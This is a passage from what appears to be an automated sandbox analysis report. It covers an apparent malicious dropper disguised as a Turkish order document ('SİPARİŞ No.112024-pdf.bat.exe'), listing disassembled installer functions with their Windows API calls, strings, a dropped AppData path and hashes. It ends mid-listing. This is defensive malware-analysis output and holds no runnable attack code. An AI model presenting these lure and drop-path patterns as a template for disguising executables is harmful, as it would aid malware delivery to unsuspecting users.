                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
                                                                  • ShowWindow.USER32(?,00000005), ref: 00404EB8
                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                                                  • GlobalFree.KERNEL32(?), ref: 00405098
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
                                                                  • ShowWindow.USER32(?,00000000), ref: 00405237
                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                                                  • ShowWindow.USER32(00000000), ref: 00405249
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $M$N
                                                                  • API String ID: 1638840714-813528018
                                                                  • Opcode ID: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
                                                                  • Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
                                                                  • Opcode Fuzzy Hash: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
                                                                  • Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58
                                                                  Function 004046EC Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040473B
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404765
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404816
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404821
                                                                  • lstrcmpiW.KERNEL32(Call,004236E8,00000000,?,?), ref: 00404853
                                                                  • lstrcatW.KERNEL32(?,Call), ref: 0040485F
                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871
                                                                    • Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1
                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                    • Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                  • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F
                                                                    • Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                    • Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
                                                                    • Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call$6B
                                                                  • API String ID: 2624150263-1518062809
                                                                  • Opcode ID: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
                                                                  • Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
                                                                  • Opcode Fuzzy Hash: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
                                                                  • Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                                  Function 6FBC1B63 Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6FBC121B: GlobalAlloc.KERNEL32(00000040,?,6FBC123B,?,6FBC12DF,00000019,6FBC11BE,-000000A0), ref: 6FBC1225
                                                                  • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6FBC1C6F
                                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 6FBC1CB7
                                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 6FBC1CC1
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC1CD4
                                                                  • GlobalFree.KERNEL32(?), ref: 6FBC1DB6
                                                                  • GlobalFree.KERNEL32(?), ref: 6FBC1DBB
                                                                  • GlobalFree.KERNEL32(?), ref: 6FBC1DC0
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC1FAA
                                                                  • lstrcpyW.KERNEL32(?,?), ref: 6FBC2144
                                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 6FBC21B9
                                                                  • LoadLibraryW.KERNEL32(00000008), ref: 6FBC21CA
                                                                  • GetProcAddress.KERNEL32(?,?), ref: 6FBC2224
                                                                  • lstrlenW.KERNEL32(00000808), ref: 6FBC223E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                  • String ID:
                                                                  • API String ID: 245916457-0
                                                                  • Opcode ID: c0f4de0e8fdede6ac6ab6cb9c1d89afeb3fd4687e361d0ec2f7fb44386372877
                                                                  • Instruction ID: aade557fcc27bc1087b52bcc9ff92d386574397018567168259b432e6b62a581
                                                                  • Opcode Fuzzy Hash: c0f4de0e8fdede6ac6ab6cb9c1d89afeb3fd4687e361d0ec2f7fb44386372877
                                                                  • Instruction Fuzzy Hash: 4822BD71D0468ADADB10CFB8E5806EFB7B4FF06315F54462AD1A5FB280D7706A81CB52
                                                                  Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                  Strings
                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow, xrefs: 004021C3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow
                                                                  • API String ID: 542301482-2362822837
                                                                  • Opcode ID: 5e736e3766f6f2c84d9b8d1786969cf60f007173139c094a39c5795cedf387ff
                                                                  • Instruction ID: 3f6190fb0288cb4cc2191ecfdaddaa4006c381b8c0a92558cc12242fdf246284
                                                                  • Opcode Fuzzy Hash: 5e736e3766f6f2c84d9b8d1786969cf60f007173139c094a39c5795cedf387ff
                                                                  • Instruction Fuzzy Hash: C9414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54
                                                                  Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: FileFindFirst
                                                                  • String ID:
                                                                  • API String ID: 1974802433-0
                                                                  • Opcode ID: 48d5054ae9fa3c66534243b530be4ac77275d228a2fdf316ae35e55088bcbc9e
                                                                  • Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
                                                                  • Opcode Fuzzy Hash: 48d5054ae9fa3c66534243b530be4ac77275d228a2fdf316ae35e55088bcbc9e
                                                                  • Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A
                                                                  Function 004043BA Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040446C
                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
                                                                  • GetSysColor.USER32(?), ref: 0040449A
                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
                                                                  • lstrlenW.KERNEL32(?), ref: 004044BB
                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404536
                                                                  • SendMessageW.USER32(00000000), ref: 0040453D
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404568
                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
                                                                  • SetCursor.USER32(00000000), ref: 004045BC
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
                                                                  • SetCursor.USER32(00000000), ref: 004045D8
                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                  • String ID: 1C@$Call$N
                                                                  • API String ID: 3103080414-3974410273
                                                                  • Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                  • Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
                                                                  • Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                  • Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68
                                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                  • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: F
                                                                  • API String ID: 941294808-1304234792
                                                                  • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                  • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                  • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                  • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                  Function 00405ED0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                                                  • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                                    • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                    • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                  • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                                                  • wsprintfA.USER32 ref: 00405F4F
                                                                  • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                                  • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406038
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                                    • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                    • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                  • String ID: %ls=%ls$[Rename]
                                                                  • API String ID: 2171350718-461813615
                                                                  • Opcode ID: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
                                                                  • Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
                                                                  • Opcode Fuzzy Hash: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
                                                                  • Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD
                                                                  Function 00406518 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                  • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                  Strings
                                                                  • *?|<>/":, xrefs: 0040656A
                                                                  • "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe", xrefs: 00406518
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406519, 0040651E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 589700163-181516417
                                                                  • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                  • Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
                                                                  • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                  • Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD
                                                                  Function 00404262 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040427F
                                                                  • GetSysColor.USER32(00000000), ref: 004042BD
                                                                  • SetTextColor.GDI32(?,00000000), ref: 004042C9
                                                                  • SetBkMode.GDI32(?,?), ref: 004042D5
                                                                  • GetSysColor.USER32(?), ref: 004042E8
                                                                  • SetBkColor.GDI32(?,?), ref: 004042F8
